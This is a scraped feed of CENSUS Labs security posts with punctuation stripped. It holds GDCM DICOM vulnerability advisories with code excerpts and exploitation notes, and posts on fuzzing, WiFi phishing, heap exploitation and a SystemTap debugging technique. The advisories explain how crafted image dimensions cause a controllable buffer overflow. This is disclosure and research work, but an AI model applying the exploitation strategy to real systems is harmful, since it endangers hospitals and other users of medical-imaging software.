http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2016-01-11 07:33:51 - www.census labs.com : CENSUS ID CENSUS-2016-0001 CVE ID CVE-2015-8396 Affected Products Applications using GDCM versions YMax Internals-YMin 1 Internals-XMax Internals-XMin 1 Internals-ZMax Internals-ZMin 1 The above variables represent the dimensions of the DICOM image region that is to be copied, and are set via a call to gdcm ImageRegionReader SetRegion In the most common case the region covers the entire image and is therefore controlled by the input file's DICOM headers, where the image dimensions are specified Specially crafted dimensions can cause the multiplication to wrap around zero, thus making the return value smaller than the real size requirements The return value is eventually saved in variable 'thelen' and then used in the buffer length check of gdcmImageRegionReadercxx, line 445 bool ImageRegionReader ReadIntoBuffer char buffer, size_t buflen size_t thelen ComputeBufferLength if buflen GetFileOffset std streampos -1 gdcmDebugMacro Using FileOffset GetFileOffset std istream theStream GetStreamPtr theStream-seekg Internals-GetFileOffset bool success false if success success ReadRAWIntoBuffer buffer, buflen if success success ReadRLEIntoBuffer buffer, buflen if success success ReadJPEGIntoBuffer buffer, buflen if success success ReadJPEGLSIntoBuffer buffer, buflen if success success ReadJPEG2000IntoBuffer buffer, buflen return success As long as the length check is passed, all of the decoding functions ReadRAWIntoBuffer, etc will assume that the input buffer is long enough so they will copy the image data into the buffer without further checks The image copy operations are executed by a number of memcpy calls, such as the following one from gdcmJPEGLSCodeccxx, line 514 memcpy buffer z-zmin rowsize colsize y-ymin rowsize bytesPerPixel , tmpBuffer1, rowsize bytesPerPixel An adversary can supply a specially crafted DICOM image file where the dimensions are such that the above discussed image size check will be bypassed through the integer overflow the number of bytes copied during memcpy ie the above rowsize bytesPerPixel argument will not be subject to an integer overflow and will be large enough to overflow the memcpy destination buffer This scenario would allow an attacker to overflow the target buffer with attacker-controlled data ie image data possibly leading, under certain conditions, to remote code execution The buffer overflow may occur regardless of the size of the buffer allocated, just as if ImageRegionReader ReadIntoBuffer contained no buffer length checks If a vulnerable version of the library must be used, there are proactive actions that can be taken to prevent the effects of the buffer overflow, such as detecting the dimensions-based integer overflow prior to calling the vulnerable API call Exploitation Notes To further analyze the risk of this vulnerability we developed a proof-of-concept exploit following the strategy described below In file gdcmImageRegionReadercxx, line 458 we see that the application supports a number of image codecs bool success false if success success ReadRAWIntoBuffer buffer, buflen if success success ReadRLEIntoBuffer buffer, buflen if success success ReadJPEGIntoBuffer buffer, buflen if success success ReadJPEGLSIntoBuffer buffer, buflen if success success ReadJPEG2000IntoBuffer buffer, buflen Manipulating data in DICOM headers of any of the above image types will lead to a buffer overflow, but as it turns out only a few of them would allow us to avoid a segmentation fault due to the large number of bytes that will need to be copied JPEG-LS proved to be a good choice in that regard Eventually the program will reach gdcm JPEGLSCodec DecodeExtent in gdcmJPEGLSCodeccxx bool JPEGLSCodec DecodeExtent char buffer, unsigned int xmin, unsigned int xmax, unsigned int ymin, unsigned int ymax, unsigned int zmin, unsigned int zmax, std istream is else if NumberOfDimensions 3 for unsigned int z zmin z zmax z std vector outv bool b DecodeByStreamsCommon dummy_buffer, buf_size, outv delete dummy_buffer if b return false unsigned char raw const unsigned int rowsize xmax xmin 1 const unsigned int colsize ymax ymin 1 const unsigned int bytesPerPixel pfGetPixelSize const unsigned char tmpBuffer1 raw for unsigned int y ymin y ymax y size_t theOffset 0 0 dimensions 1 dimensions 0 y dimensions 0 xmin bytesPerPixel tmpBuffer1 raw theOffset memcpy buffer z-zmin rowsize colsize y-ymin rowsize bytesPerPixel , tmpBuffer1, rowsize bytesPerPixel This function goes through each JPEG-LS frame in the DICOM file by looping from 'zmin' to 'zmax' our file is multi-frame, meaning basically 3-dimensional , it decodes the frame by calling DecodeByStreamsCommon , then copies each frame to our small buffer by looping through 'ymin' and 'ymax' and calling memcpy for each row This will cause the buffer to overflow at some point Our goal is for the buffer to overflow by one of the memcpy calls without causing a segmentation fault and then for the code to immediately exit the loop, so as to to avoid a segmentation fault caused by a further call to memcpy We note that the function will return if the return value of DecodeByStreamsCommon is false As it turns out, it is not hard to arrange that bool JPEGLSCodec DecodeByStreamsCommon char buffer, size_t totalLen, std vector amprgbyteOut const BYTE pbyteCompressed const BYTE buffer size_t cbyteCompressed totalLen JlsParameters params if JpegLsReadHeader pbyteCompressed, cbyteCompressed, ampparams OK gdcmDebugMacro Could not parse JPEG-LS header return false What the attacker has to do to stop the loop is to provide a malformed JPEG-LS header, right after the frame which is responsible for the overflow An input file that causes a crash is available here, and sample code triggering the bug is available here Discussion Applications that use the ImageRegionReader ReadIntoBuffer API call from GDCM versions 261, 260 and possibly earlier versions to process untrusted medical image data may allow attackers to cause memory corruption, denial of service or possibly remote code execution on the systems hosting these applications The GDCM project has released version 262 that addresses this issue It is advised to upgrade all GDCM installations to the latest stable release Disclosure Timeline CVE assignment December 2nd, 2015 Vendor Contact December 4th, 2015 Vendor Patch Release December 23rd, 2015 Public Advisory January 5th, 2016 http://www.secuobs.com/revue/news/595302.shtmlhttp://www.secuobs.com/revue/news/595302.shtml Secuobs.com : 2016-01-11 07:33:51 - www.census labs.com - CENSUS ID CENSUS-2016-0002 CVE ID CVE-2015-8397 Affected Products Applications that use GDCM versions 262 to process JPEG-LS images Class Out-of-bounds Read CWE-125 Discovered by Stelios Tsampas Grassroots DICOM GDCM is a C library for processing DICOM medical images It provides routines to view and manipulate a wide range of image formats and can be accessed through many popular programming languages like Python, C , Java and PHP Various applications that make use of GDCM are listed here and here GDCM versions 260 and 261 and possibly previous versions are prone to an out-of-bounds read vulnerability due to missing checks The vulnerability occurs during the decoding of JPEG-LS images when the dimensions of the embedded JPEG-LS image as specified in the JPEG headers are smaller than the ones of the selected region set by gdcm ImageRegionReader SetRegion and usually based on DICOM header values Details The faulty operation can be found twice in function JPEGLSCodec DecodeExtent of file gdcmJPEGLSCodeccxx, once in line 463 for two-dimensional DICOM images and once more in line 518 for three-dimensional DICOM images Both cases are similar bool JPEGLSCodec DecodeExtent char buffer, unsigned int xmin, unsigned int xmax, unsigned int ymin, unsigned int ymax, unsigned int zmin, unsigned int zmax, std istream is std vector outv bool b DecodeByStreamsCommon dummy_buffer, buf_size, outv if b return false unsigned char raw const unsigned int rowsize xmax xmin 1 const unsigned int colsize ymax ymin 1 const unsigned int bytesPerPixel pfGetPixelSize const unsigned char tmpBuffer1 raw unsigned int z 0 for unsigned int y ymin y ymax y size_t theOffset 0 z dimensions 1 dimensions 0 y dimensions 0 xmin bytesPerPixel tmpBuffer1 raw theOffset memcpy buffer z-zmin rowsize colsize y-ymin rowsize bytesPerPixel , tmpBuffer1, rowsize bytesPerPixel DecodeByStreamsCommon will attempt to decode the JPEG-LS image found in the DICOM file and place its contents in outv The size of outv depends only on the dimensions reported by the JPEG-LS image headers xmin, xmax, ymin, ymax, zmin, zmax are the dimensions of the DICOM image region, which are set by gdcm ImageRegionReader SetRegion The region usually takes up the entire image, meaning that its dimensions are derived from the DICOM headers, although theoretically it could be an arbitrary 2-d rectangle or 3-d rectangular box The dimensions array holds the dimensions of the decoded JPEG-LS image For each iteration in the for loop, memcpy will copy rowsize bytesPerPixel bytes from raw theOffset, with raw pointing to outv and theOffset increasing according to the JPEG-LS image's x dimension and the region's ymin, ymax and xmin note that z is 0 in the above 2-d copying operation The problem is that GDCM does not take into account the fact that the region to be copied could potentially be bigger than the image present in the file For instance, if the JPEG-LS image has the same x dimension as the region but a much smaller y dimension, then raw theOffset will point past the end of outv when the loop counter increases beyond the image's y dimension This will lead to an out-of-bounds read condition Discussion This is an information disclosure issue An attacker could potentially leak parts of an application's memory or cause an application to crash, by providing a specially crafted DICOM file Applications that process JPEG-LS images via GDCM versions prior to 262 may be subject to this vulnerability The GDCM project has released version 262 that addresses this issue It is advised to upgrade all GDCM installations to the latest stable release Disclosure Timeline CVE assignment December 2nd, 2015 Vendor Contact December 4th, 2015 Vendor Patch Release December 23rd, 2015 Public Advisory January 11th, 2016 http://www.secuobs.com/revue/news/595301.shtmlhttp://www.secuobs.com/revue/news/595301.shtml Secuobs.com : 2015-12-04 17:55:39 - www.census labs.com - CENSUS researchers Nikolaos Naziridis and Zisis Sialveras have recently presented their research on knowledge-based evolutionary fuzzing, at ZeroNights 2015 in Moscow, Russia The talk introduced a cross-platform evolutionary fuzzing framework, that will be released as a free and open-source tool IMAGE The tool that was created as a result of this research is a file format fuzzer that uses evolutionary algorithms to produce new test files The target file format is described by the user, via a simple python API which can focus the fuzzer to a specific subset of features of the target application In the talk, we discussed the reasons we had to develop the fuzzer, along with the thought process that led us to the current list of supported features in Choronzon We presented the tool s architecture, its design and engineering approach as well as the problems we have faced and the solutions we came up with Finally, we compared the different fuzzing strategies implemented in other feedback-driven fuzzers, namely honggfuzz and AFL against the techniques we used in Choronzon You may find the slide deck here The conference was a fun experience with a lot of interesting content this year Many thanks to the organizing committee, as well as the team of volunteers for all their efforts to ease our stay in Moscow and facilitate our talk http://www.secuobs.com/revue/news/592136.shtmlhttp://www.secuobs.com/revue/news/592136.shtml Secuobs.com : 2015-09-24 17:26:06 - www.census labs.com - In the aftermath of the recent Android stagefright vulnerabilities, efficient fuzz testing techniques and tools for the Android ecosystem are again in the spotlight In this post we would like to share some of the fuzz testing experience we have gained through our projects and show how it can be applied in the Android world Additionally, we ll enlist some of the public contributions we ve made to open source tools aiming to help the community focus more on the target and less on the tooling IMAGE The race for unique crashes When fuzzing campaigns are completed researchers expect to proceed with the investigation of craches bug-triaging rather than separating duplicates and going through garbage information As such every decent fuzzing tool or framework offers either a post-run or runtime unique crash detection logic While many prefer to filter unique crashes at the post-run stage, we strongly believe that it is more efficient to implement this at runtime Especially for target environments with limited native debugging capabilities eg Android OS that require time-consuming remote analysis sessions For example, in our initial fuzzing work against the new Android ART runtime 1 , each post-run GDB-scripted analysis was costing 6-10 seconds per crash This is a big cost, especially when one considers the case where the same low hanging fruit bug is triggered over and over again The most common unique crash filtering technique is to unwind the stack of the thread that triggered the abnormal behavior and use frame information to construct a signature of the crash Depending on the fuzzing environment characteristics OS, security controls, etc and target application, the available frame information might greatly vary affecting the fingerprinting logic Hence, the decision algorithm that identifies a unique bug must cater for the above target characteristics ASLR, sanitizer enabled builds, symbols, etc without requiring a manual tune or code refactoring effort per target Moving to the implementation details, post-run analysis tools prefer to utilize debuggers with scripting capabilities GDB, LLDB, WinDBG, etc to unwind and collect frame information Runtime analysis tools require either a built-in unwinder eg libunwind or a target-aware dynamically linked backtrace library eg libbacktrace for Android OS 50 For our Android fuzzing projects, we preferred the option of a built-in unwinder in order to avoid the dependency and versioning nightmare Balancing our limited options, we chose libunwind 2 and patched this to support Android NDK cross-compilation for arm, arm64, x86 and x86_64 CPUs A fully Android compatible libunwind is also maintained by Google in the AOSP tree used internally by libbacktrace 3 We prefer to use a vanilla upstream fork of libunwind, because this AOSP mirror contains significant changes in order to support the Android debuggerd business requirements Having the unwinder available at runtime, the next step was to write a frame fingerprinting algorithm that could also be applied to the Android OS After a series of discussions with argp, fel1x and others, the following algorithm was selected for the signature hash If ProcFS maps read is available Parse target ProcFS maps Calculate frame s relative PC Use relative PC file name if region was mapped from a file of each frame Hash the first N most important frames to create the crash signature If ProcFS maps read is not available Use the last 3 nibbles of frame s PC as frame fingerprint Hash the first N most important frames to create the crash signature Relative PC and 3 least significant address nibbles ensure that in cases where disabling ASLR is not an option, hash signatures will maintain their values across runs Additionally, it ensures that if the same binaries are loaded on different systems eg different Nexus devices , the unique signatures will be valid across all devices The number of frames that construct the signature is a trade-off that highly depends on the code structure of the target Usually we default it to 7 frames and this appears to be a good tradeoff for most targets Our built-in libunwind support and parts of the signature algorithm have been contributed to the honggfuzz open source project 4 as part of the Linux Android PTRACE backend Blacklisting triaged crashes The initial fuzzing campaigns usually produce crashes that to a large extent 50pourcents 70pourcents are caused by non exploitable bugs To avoid carrying that noise in future campaign rounds, a blacklist file is maintained for each fuzzing target setup We reuse the previous stack hash algorithm to assemble a list of hashes that represent non-interesting crashes This list is then fed to the fuzzing engine which skips them if found again during the campaign A honggfuzz stack hash blacklisting feature has been committed here 5 and will be pushed upstream soon Automatic runtime reports In highly successful fuzzing campaigns ie campaigns that have identified a large number of unique crashes there s always the dilemma of where to start the analysis from Some have the charisma and randomly pick the most promising crashes For the rest of us, investigating additional contextual data helps a lot in the prioritization process Inspired by the initial honggfuzz report created by robertswiecki we save the following information at runtime for each identified unique and non-blacklisted crash Fuzzer configuration Fuzzing target configuration and invoking arguments Original seed file name used to generate the test case for mutation based cases only PID of crashed target process Signal type code Fault address if available depends on the crash signal type Crash instruction assembly via statically compiled libcapstone Stack hash signature Full unwinded backtrace doesn t stop on major N frames of the signature ProcFS maps copy if available Register values at crashing frame We ve contributed most of our Android-specific crash reporting features to upstream honggfuzz 4 The road towards a native fuzzing framework In order to efficiently perform fuzz testing against Android OS systems, we developed fully native C C engines fuzzing core, data generation, etc that could run on target devices without requiring remote host support Although dealing with the Android internals debuggerd ptrace, signal masking, bionic restrictions, compatibilities, etc was seen as a significant cost during initial development, it was a cost that we decided to pay aiming at better results Of course a maintenance cost will always remain, caused mainly by the Android OS evolution and vendor fragmentation And that is one more reason towards our decision to publicly contribute part of our work, so that community feedback can hopefully balance it up Once we had a stable and robust fuzzer core to work with, we were left to develop a data generation engine that would stress test each target application Until recently our approach was to add the target-specific data generation logic to the fuzzer core, as we didnt want to pay the cost of an additional execve per iteration to invoke external tools This approach resulted into big fragmentation and significant backport cost while we were adding features to the fuzzing engine As such we took a step back and decided to upgrade the fuzzing engine into something more modular that can easily interface with 3rd party code through extensions File format fuzzing parsers, decoders, etc is a nice example of how researchers can benefit from the proposed extensions approach In order to efficiently fuzz such targets, a common strategy under the mutation-based philosophy, is to apply smart mutations against the original corpus, while at the same time respecting parts of the target format structure header metadata, CRCs, etc Open source libraries and public tools can be easily chained together to accomplish this task On the same note, native extensions are implemented by exporting a set of callbacks that will be triggered by the fuzzing engine Callbacks are exported for the 5 main steps of a fuzzing campaign 1 Initialization phase corpus pre-parsing 2 Per fuzzing iteration data preparation Decision on mangling algorithm Prepare resize data buffers 3 Per fuzzing iteration data mangling 4 Per fuzzing iteration post mangle fix-ups Repair checksums, metadata, headers, etc Discard iteration if some requirements haven t been met 5 Crash detection post event In case additional triaging automation is desired Native extensions are activated at compile time They can make use of existing codebases libraries, parsers, header definitions, etc and can be maintained as standalone entities This cuts down on the tooling cost significantly, as math libs, file parsers and other libraries available in native code can be reused In order to get further feedback from the community we decided to port part of this approach to the honggfuzz engine On the master-dev branch 6 one can find a prototype implementation of the extension callbacks feature As a proof of concept, sample PNG and DEX file format fuzzing extensions have been pushed under the extensions directory You can follow commit logs or the new feature issue discussion page 7 for more details about the current state of the prototype Concluding remarks At the end of the day the adoption of a fuzzing tool or fuzzing technique is really a matter of personal preference There s a wide variety of fuzzing engines to choose from, and they still remain successful across many different targets Having said that, we believe that for limited resource environments, such as embedded devices, researchers should not spend their time in reinventing the wheel, especially for core fuzzing functionality Smart people should be motivated to write test case generation algorithms and targeted fuzzing templates, instead of debugging ptrace et al wrappers Through evaluation of the publicly available tools and through discussions with infosec researchers, we realized that the Android security community was lacking a generic but efficient fuzzing tool The majority of publicly available fuzzing and triaging projects were relying on some very inefficient, fragile and hack-ish mechanisms that performed remote target execution adb , monitoring debuggerd over logcat and crash data collection tombstones Such techniques practically void all previously discussed strategies that can be used to optimize fuzzing campaigns For this reason, we decided to publicly contribute to a generic fuzzing tool honggfuzz, by way of implementing native Android OS support for the PTRACE and POSIX API architecture backends Hopefully, Android researchers will benefit from our work, re-use the engine as a drive-in for more native tools and contribute back with ideas or identified inefficiencies bugs Additionally, we re very happy to see that the Android team has started integrating the in-process LLVM libFuzzer fuzzing library in AOSP When combined with LLVM sanitizers in the build tree, it definitely aids researchers that are focusing on the Android ecosystem If you would like to share your thoughts or comments with us, feel free to drop an email to the team References 1 http census-labscom news 2015 06 18 fuzzing-objects-de-ART-HITB2015AMS 2 http wwwnongnuorg libunwind 3 https androidgooglesourcecom platform external libunwind 4 https githubcom google honggfuzz 5 https githubcom anestisb honggfuzz tree stackhash_blacklist 6 https githubcom anestisb honggfuzz tree master_dev 7 https githubcom google honggfuzz issues 16 http://www.secuobs.com/revue/news/584589.shtmlhttp://www.secuobs.com/revue/news/584589.shtml Secuobs.com : 2015-08-26 08:36:39 - www.census labs.com - Hello My name is George Chatzisofroniou sophron and I work as a security engineer at CENSUS My current interests include cryptography, WiFi hacking, web security and network security This summer I gave a talk at BSides London The talk was called Introducing wifiphisher, a tool for automated WiFi phishing attacks and revolved around my recently published tool IMAGE Wifiphisher is a security tool that mounts phishing attacks against WiFi networks I released it in early 2015 and since then it became quite popular with a lot of press coverage Community-driven BSides London seemed to be the perfect choice for introducing the tool and clarifying its purpose In the first part of my talk, I explained in detail Karma and Evil Twin two WiFi man-in-the-middle attacks Both of these attacks exploit the lack of encryption in management frames by forging DEAUTH packets and then disrupting any existing associations of the targeted network Furthermore, both attacks take advantage of the auto-connect flag that is enabled by default in modern network managers by setting up a rogue Access Point that the victim will eventually connect to In Karma, the phony Access Point is created based on probe request frames, whereas in the Evil Twin attack, the phony Access Point is modelled by the target Access Point I showed how the success rates of these attacks differ depending on the environment and how differently network managers react to them In the second part, I introduced wifiphisher and showed how it automates the Evil Twin in order to mount phishing attacks At that point, I compared wifiphisher with other similar tools LINSET and Pineapple and showed how one may contribute to the project Finally, I discussed common countermeasures against these attacks, including WIDPS, 80211X and security awareness training Material from my talk can be found here Presentation slides pdf Presentation video youtube Wifiphisher project page github repo A related post about this talk was also published on Tripwire s State of Security blog During the conference, I had a great time meeting new people and discussing interesting ideas regarding the future of the tool Credit to the organisers of the event who made it real http://www.secuobs.com/revue/news/581393.shtmlhttp://www.secuobs.com/revue/news/581393.shtml Secuobs.com : 2015-06-18 10:17:00 - www.census labs.com - Hello, my name is Anestis Bechtsoudis and I m a security engineer at CENSUS I recently gave a talk on Android ART runtime fuzzing techniques at the Hack-in-the-Box 2015 Amsterdam security conference The talk entitled Fuzzing Objects d ART Digging Into the New Android L Runtime Internals , analyzed a series of DEX smart fuzzing techniques targeting the bytecode optimization and compilation components of the new Android ART runtime IMAGE The talk s abstract was In an effort to deal with performance challenges in the Android ecosystem, Google has made an investment aiming to fully replace the old JIT Dalvik VM with the brand new AOT Ahead-Of-Time ART runtime It has been more than a year since ART was open-sourced and its first production releases are reaching the market However, there is currently almost zero public knowledge about the security maturity of ART and its interfacing functionality This talk is the first milestone of a greater research effort aiming to analyze all of the new ART runtime internals, depict the exploitation impact of identified bugs in the Android ecosystem and mark the requirements for the development of new tools To assist this analysis, the first DEX file format smart fuzzing engine has been implemented supporting a series of rulesets mirroring the various fuzzing requirements The input generation and fuzzing toolset we have developed run directly on Android devices and monitor the investigated processes DEX smart fuzzing techniques and evaluation metrics will be presented against the initial target of the ART runtime, which is the bytecode optimization and compilation chain DEX parser, IR processing code generation for the ARM architecture In order to prove the efficiency of our smart fuzzing techniques, we compare our results against dumb fuzzing iterations with identical characteristics You may find the related presentation material below Whitepaper Slides We would like to specially thank Dhillon Andrew Kannabhiran, the conference organizing committee and volunteers for their warm welcome and outstanding support services http://www.secuobs.com/revue/news/574487.shtmlhttp://www.secuobs.com/revue/news/574487.shtml Secuobs.com : 2015-06-16 09:47:00 - www.census labs.com - About two months ago April 15th 2015 I visited Miami and presented at the INFILTRATE Security Conference a talk on Firefox heap exploitation, titled OR LYEH The Shadow over Firefox The organization of the conference was flawless and the people I met there were amazing A special thank you to the Immunity team for being great hosts and for their helpful feedback IMAGE In the talk I expanded upon and updated previous work I have done on Firefox jemalloc heap exploitation, taking into account Firefox s new GC implementation Also, I introduced a major upgrade of the unmask_jemalloc Firefox heap exploration utility with new features, and support for Windows and the WinDbg debugger The new version of unmask_jemalloc, named shadow , will be released soon You can find the public version of my slide deck here If you have attended INFILTRATE 2015, mail me to request the full version of the slides and the version of the shadow utility I demonstrated at the conference In case you missed my talk at INFILTRATE you have another chance to catch it at Summercon on July 18th at NYC I hope to see you there http://www.secuobs.com/revue/news/574187.shtmlhttp://www.secuobs.com/revue/news/574187.shtml Secuobs.com : 2015-06-14 13:24:34 - www.census labs.com - Hello, my name is Andrzej Dyjak and I m part of the research team here at CENSUS A few weeks ago on May 26th I gave a talk titled DTrace OS X Fun at CONFidence 2015 in which I have described how DTrace can be used in order to ease various tasks within the realm of dynamic analysis on the OS X platform The slides from this talk are now also available here http://www.secuobs.com/revue/news/573982.shtmlhttp://www.secuobs.com/revue/news/573982.shtml Secuobs.com : 2015-04-03 18:38:34 - www.census labs.com - CENSUS was one of the sponsors of the 5th InfoCom Security conference, that was held on April 1st, 2015 at the Divani Caravel hotel in Athens, Greece IMAGE At the 17 30 session, our director of Security Testing services Mr Nikolaos Tsagkarakis delivered a presentation entitled Malicious Technologies in which he showed how technologies and techniques used by attackers can be used for the production of more secure systems We would like to thank the organizers for this great event and hope to meet again soon IMAGE http://www.secuobs.com/revue/news/565980.shtmlhttp://www.secuobs.com/revue/news/565980.shtml Secuobs.com : 2015-02-24 19:00:08 - www.census labs.com - CENSUS will be sponsoring the 5th InfoCom Mobile World conference, that will be held on February 26th, 2015 at the Divani Caravel hotel in Athens, Greece IMAGE At the 10 20 session, Dimitris Glynos will be delivering a presentation entitled The Mobile ThreatScape , describing the current threats to the mobile app ecosystem, with examples coming from real world app security assessments We hope to see you there http://www.secuobs.com/revue/news/560950.shtmlhttp://www.secuobs.com/revue/news/560950.shtml Secuobs.com : 2014-11-27 16:40:08 - www.census labs.com - CENSUS researcher Patroklos Argyroudis has recently presented a talk on heap exploitation abstraction at two conferences, namely ZeroNights 2014 Moscow, Russia and BalCCon 2014 Novi Sad, Serbia In the talk titled Project Heapbleed , Patroklos has collected the experience of exploiting allocators in various different target applications and platforms He focused on practical, reusable heap attack primitives that aim to reduce the exploit development time and effort IMAGE The talk s abstract was the following Heap related bugs such as buffer overflows, use-after-frees, dangling stale pointers, double frees leading to corruptions of virtual memory and vulnerable conditions, constitute the most common type of memory corruption bugs The exploitation of heap vulnerabilities is a process that requires a lot of time and effort It requires meticulous understanding of the underlying heap allocator its data structures metadata and its allocation deallocation algorithms It requires understanding of how the target application uses the API provided by the heap allocator to manage dynamic memory and the allocation patterns that emerge due to this use It also requires understanding of the application-specific data and how where these are placed on the heap Finally, it requires studying of the way the user can influence the application and use its provided functionality to control its heap as reliably as possible with the goal to create conditions aiding exploitation All these must be viewed in the context of complicated bugs, since low-hanging fruits are scarce, and the vendors adoption of increasingly sophisticated exploitation mitigation technologies We argue that although the details between the different heap allocators, target applications and bugs at hand obviously vary, the heap exploitation methodologies that have been formed by practical experience can be abstracted to reusable primitives that can be applied to new targets Project Heapbleed is our attempt to define, clearly articulate, categorize and where applicable implement these primitives, aiming to provide a practical reusable heap exploitation toolset The slides are available here http://www.secuobs.com/revue/news/547559.shtmlhttp://www.secuobs.com/revue/news/547559.shtml Secuobs.com : 2014-11-24 22:13:52 - www.census labs.com - On Friday November 28th 2014, Dimitrios Glynos will give a presentation entitled Protecting the Digital Now CENSUS IT Security Works at the FORTH Institute of Computer Science in Heraklion, Crete IMAGE For the past 5 years CENSUS has been providing specialized IT security services to both public and private organizations, protecting some of the biggest names in the financial, telecommunications and software hardware vendor markets This presentation will provide a peek into our work and the challenges faced by organizations in today s connected world See here for more information about this talk If you re interested in IT security or the work performed by CENSUS then don t miss out on this There will also be plenty of time for networking and Q A We would like to thank Professor Sotiris Ioannidis and the FORTH institute for hosting this talk http://www.secuobs.com/revue/news/547047.shtmlhttp://www.secuobs.com/revue/news/547047.shtml Secuobs.com : 2014-11-07 15:04:50 - www.census labs.com - CENSUS researchers Alex Zacharis and Nikos Tsagkarakis presented their Point-of-Sale exploitation work entitled PoS Attacking the Traveling Salesman at this year s DEFCON conference in Las Vegas, USA IMAGE The talk illustrated vulnerabilities of airport point-of-sale systems that could be used by adversaries to collect passenger data Material from this talk can be found here Presentation Slides The Aztec Revenge Tool The presentation was a success and caught the attention of various technology blogs http insightswiredcom profiles blogs defcon-22-hacking-airports-airplanes-airwaves https blogbit9com 2014 08 20 2014-def-con-hacking-conference-bit9-carbon-black-roundup-with-photos http wwwtripwirecom state-of-security vulnerability-management defcon-22-hacking-airports-airplanes-and-airwaves IMAGE We would like to thank the organizers of DEFCON for hosting this great event and hope to meet everyone again next year http://www.secuobs.com/revue/news/544333.shtmlhttp://www.secuobs.com/revue/news/544333.shtml Secuobs.com : 2014-11-06 13:03:03 - www.census labs.com - Hello, my name is Nikos Naziridis and I am a security researcher at CENSUS In this post, I will present how SystemTap and kernel instrumentation in general, could be used to aid the process of determining the exploitability of unbound memory overflows and the detection of thread race condition bugs IMAGE Introduction For the reader who is not familiar with SystemTap and the concepts of kernel instrumentation, I will attempt to make a small introduction, however for more details please refer to the References section In this post I will be talking about the Linux kernel versions 26 and SystemTap versions 22 If you feel at ease with SystemTap or how kernel instrumentation works you may skip to the next section Kernel instrumentation is a set of techniques that allows a user to monitor and trace the execution of a kernel One popular implementation of kernel instrumentation is the Kprobes Kernel Probes system Kprobes allows a user to develop a kernel module that will hotpatch specific instructions in the kernel code with trampoline functions If such a patched instruction is executed, then the execution flow jumps into one of these aforementioned functions, runs user provided code and then returns to the original instruction SystemTap automates the process of developing a kernel module and abstracts the user from the kernel specifics It does this by exposing a variety of probe points for Kprobes and provides utility functions in a scripting language it understands When a script in this language is run through SystemTap, it is translated to C code, compiled as a kernel module and loaded into the running kernel automatically IMAGE An example Imagine a heap buffer overflow vulnerability that is the result of an unsigned integer overflow used as the size parameter for a memcpy call The nature of the bug, while common enough, introduces complications to its exploitation The following snippet, though unrealistic, is sufficient to showcase the bug int one int two char stack char heap char malloc sizeof one memcpy heap, stack, one two It is apparent that if two was larger than one, then the result of one two would be negative Of course, the size parameter that memcpy expects is size_t, which is an unsigned type This would result in an unsigned integer overflow, and the negative integer would be interpreted as a very large number Unable to detect this, memcpy would try to copy this large number of bytes from stack to heap until it would trigger an access violation So, determining the exploitability of a vulnerability such as this, boils down to whether the attacker can control the size of the overflow or not Possible solutions One solution to situations similar to the above, is to try and provide a value in one or two, such that would produce an integer underflow and wrap around to a size that suits the attack scenario But there are many occasions where this is not possible, so let s assume this is the case Since inducing an underflow is out of the question and there are no arithmetic operations that could provide control over the overflow size, another solution would be to look at memcpy s implementation Gobbles apache-scalp exploit for BSD systems in 2002, solved a similar case by abusing the fact that the BSD memcpy stores the number of remaining bytes to be written in a stack variable So, by overwriting this value, an attacker could dynamically control the overflow size Though, in this case, the overflow copies data from the stack to the heap, so again this would not work If there is no conventional way to control the overflow size, then how about trying to stop or delay it Imagine, that the snippet above was part of a large threaded program Then, in theory, there could be a thread race condition situation not necessarily a bug that would allow us to use a portion of the overflown memory from one thread, before the preempted thread that does the memcpy call reaches a protected unmapped area But even if such a thing was possible, how would we debug this Enter SystemTap The Linux kernel uses a scheduler with dynamic priorities, that supports preemption This means that at any given moment the thread being executed can be replaced by another thread that is considered by the scheduler as more important Since the scheduling happens in the kernel, it should be accessible from a kernel module So, by using SystemTap we should be able to monitor the preemption Indeed, we could use the schedulercpu_off probe to do something like global goflag 0, interesting_pid 0 probe scheduler every time a task is switched probe schedulercpu_off if execution reached the interesting point if goflag find the pid and base dynamic priority of the tasks involved prevpid task_pid task_prev nextpid task_pid task_next prevprio task_prio task_prev nextprio task_prio task_next inform the user printf switched pourcentslu p pourcentslu to pourcentslu p pourcentslu n , prevpid, prevprio, nextpid, nextprio print_regs print_ubacktrace This adds a probe point called tap in SystemTap s lingo that would be called every time a thread is being scheduled off a CPU core If you would run this with SystemTap, it would produce a garbage-ridden output that would contain all thread preemptions occuring in the system To actually produce output that is relevant to the problem at hand, we need to be able to run our code just before the memcpy call and until a SIGSEGV or other terminating condition occurs Fortunately, SystemTap implements many different probe points that can help with this, namely signalsend and process statement Therefore, we can use something like the following to start monitoring set a probe for the interesting point probe process path to lib libso statement whateverc 1337 use some globals to enable probing when the execution reaches whateverc 1337 file line_number store the current pid interesting pid currtask task_current interesting_pid task_pid currtask set the go flag goflag 1 printf reached interesting point starting n To define an ending condition, we can add if you detect an access violation SIGSEGV 11 probe signalsend check if it is intended for the interesting task currtask task_current currpid task_pid currtask if interesting_pid currpid if sig 11 SIGSEGV inform and die printf detected SIGSEGV to process pourcentslu stopping n , interesting_pid exit In the case that there are no debugging symbols available for our target application, we could use process statement ADDRESS absolute and provide an absolute virtual address for the probe By using start and end conditions, the above script would only show threads preempting in the critical time window Conclusion Using SystemTap and Kprobes we have implemented a way to examine the threads that preempt the thread that does the vulnerable memcpy call We can also put our target application under stress conditions for example, forcing it to process large amounts of user input in order to see if the memcpy thread can indeed be preempted by some other thread If there is such a thread, we can now carefully study it in order to see if it accesses the partially overflown memory, or any variables overwritten by it, and determine if there are exploitable conditions References Check the following links for more details on the subject discussed http enwikipediaorg wiki Instrumentation https sourcewareorg systemtap wiki https sourcewareorg systemtap tapsets https sourcewareorg systemtap kprobes http://www.secuobs.com/revue/news/544093.shtmlhttp://www.secuobs.com/revue/news/544093.shtml Secuobs.com : 2014-05-12 11:23:05 - www.census labs.com - census ID census-2014-0001 CVE ID CVE-2014-0450 Oracle Tracking S0388414 CPUApr2014 Affected Products Oracle Fusion Middleware versions 11117 and 11118 Class Information Exposure CWE-200 , Privacy Violation CWE-359 Remote Yes Discovered by Alex Zaharis Researched by Alex Zaharis, Patroklos Argyroudis The Oracle WebCenter portal component in Oracle Fusion Middleware versions 11117 and 11118 is vulnerable to an information exposure vulnerability A malicious user may utilize this vulnerability to gain unauthenticated access to the list of valid usernames of the system, the users personal information and files linked to the users profiles Details Oracle WebCenter is a platform for building web applications, web portals and collaboration web sites It is owned and developed by Oracle targeting the enterprise portal market We have discovered an information exposure vulnerability in the Oracle WebCenter portal component in Oracle Fusion Middleware versions 